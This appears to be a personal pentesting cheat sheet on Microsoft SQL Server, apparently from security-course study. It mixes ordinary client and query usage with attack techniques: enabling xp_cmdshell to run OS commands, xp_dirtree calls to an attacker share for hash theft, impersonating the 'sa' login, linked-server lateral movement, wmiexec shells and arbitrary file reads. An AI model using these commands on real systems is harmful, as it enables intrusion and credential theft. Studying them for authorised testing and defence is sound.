MSSQL 🐭

footprinting attacking_common_services

Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft. It's often used by developers when building .NET applications.

SQL Server Management Studio (SSMS) is a graphical client that can be installed along MSSQL or separately. It allows database administrators, developers, and other users to perform various tasks related to SQL Server databases.

🐲 MSSQL default port is 1433 or 2433 (TCP) and 1434 (UDP).

Common commands:

select name from sys.databases    -- list databases
select name from sys.databases where name not in ('master', 'tempdb', 'model', 'msdb');
use db_name;                      -- select a database
-- list the tables in the database
select table_name from information_schema.tables where table_type = 'base table';
-- list the columns of the table "table_name_here"
select column_name, data_type from information_schema.columns where table_name = 'table_name_here';
-- list users (1), and sysadmins (2)
SELECT name, password,sysadmin FROM syslogins
SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

MSSQL Clients

Windows client β€” sqlcmd

On Windows, you can use the sqlcmd utility.

PS> # -E == Windows Auth | -Q == Query
PS> sqlcmd -E -Q "select name from sys.databases"
PS> sqlcmd -E -i query.sql
PS> sqlcmd -S server_name -U sa -P password [...]

If WMI (DCOM) is available, from a Linux host, you can access sqlcmd after popping a powershell:

$ impacket-wmiexec username:password@IP -shell-type powershell

Windows client β€” PowerUpSQL

On Windows, you can use PowerUpSQL (2.3k ⭐).

PS> Import-Module .\PowerUpSQL.ps1
PS> Get-SQLInstanceDomain
PS> Get-SQLQuery -Verbose -Instance "IP,1433" -username "example\username" -password "password" -query 'Select @@version'

Linux client β€” sqlsh

You can use sqlsh on Linux.

$ sqsh -S IP -U 'username' -P 'password' -h
$ sqsh -S IP -U '.\\username' -P 'password' -h
1> some query
2> go

Linux client β€” impacket

You can alternatively use mssqlclient.

$ impacket-mssqlclient username@IP -windows-auth
$ impacket-mssqlclient username:password@IP -windows-auth

The SQL Server might user Windows Authentication or Username/Password Authentication. Use or remove-windows-auth accordingly.


MSSQL Pentester Notes ☠️

Enumeration

  • We can use nmap to run scripts
$ nmap -sC -sV --script "*ms-sql*" -p 1433 IP
mfs6> search mssql/

FootHold

attacking_common_services

mfs6> use mssql_enum_sql_logins
mfs6> set RHOSTS IP
mfs6> set USERNAME username
mfs6> set PASSWORD password
mfs6> set USE_WINDOWS_AUTHENT true
mfs6> run

Exploitation - Part I

attacking_common_services active_directory_enumeration_attacks

  • xp_cmdshell can be used to run commands. It's disabled by default. The command is runs with the same permissions as the server.
-- [EXECUTE] sp_configure 'show advanced options', 1
-- RECONFIGURE
-- [EXECUTE] sp_configure 'xp_cmdshell', 1
-- RECONFIGURE
xp_cmdshell 'whoami'

Note that you can use enable_xp_cmdshell in impacket-mssqlclient.

  • We can steal hashes by setting up a responder
EXEC master..xp_dirtree '\\IP\share\'
EXEC master..xp_subdirs '\\IP\share\'
  • We may be able to impersonate users:
-- list users we can impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
-- impersonate user 'sa'
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin')
REVERT # cancel impersonation

Exploitation - Part II

  • Extended Store Procedures
  • CLR Assemblies
  • SQL Server Agent Jobs
  • External Scripts
  • xp_regwrite can be used to create registry entries
  • User Defined Functions in C/C++ (ex)

Lateral Movement

attacking_common_services

The current server may be linked to other servers. If we compromise it, we may be able to run SQL queries on linked servers.

  • List Linked Servers
SELECT srvname, isremote FROM sysservers
  • Execute a SQL Query on a Linked Server
EXEC('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [your_target_here]
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [your_target_here]

Additional Notes

  • If installed, look for saved credentials in SSMS

  • The services often runs as NT SERVICE\MSSQLSERVER

  • By default, encryption is not enforced when attempting to connect.


πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • Try running the tool as administrator
  • HeidiSQL, SQLPro, mssql-cli
  • System Databases
SELECT name FROM master.dbo.sysdatabases
SELECT table_name FROM xxx.INFORMATION_SCHEMA.TABLES

Write files

-- enable to write
sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
-- use it...
-- can read any file
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

SSMS

  • File > New > Query with current connection
  • Press execute to run the file
  • Need to add GO?